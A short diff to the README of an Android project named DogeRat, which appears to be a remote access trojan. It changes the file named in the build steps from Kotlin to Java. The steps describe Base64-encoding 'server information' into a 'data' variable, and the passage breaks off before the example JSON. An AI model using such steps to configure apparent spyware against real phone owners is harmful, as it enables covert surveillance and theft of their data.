Did-Dog/DogeRat/README.md

 To build the application in Android Studio, follow these steps:

 1. Open the Android Studio and import the application source code.
-2. Navigate to the following path in the source code: `Utils/AppTools.kt`.
+2. Navigate to the following path in the source code: `Utils/AppTools.java`.
-3. In the `AppTools.kt` file, locate the `data` variable and copy your server information into it.
+3. In the `AppTools.java` file, locate the `data` variable and copy your server information into it.
 4. However, before copying the server information directly into the variable, you must encode it using Base64.
 5. Here is an example JSON structure for your server information:
 ```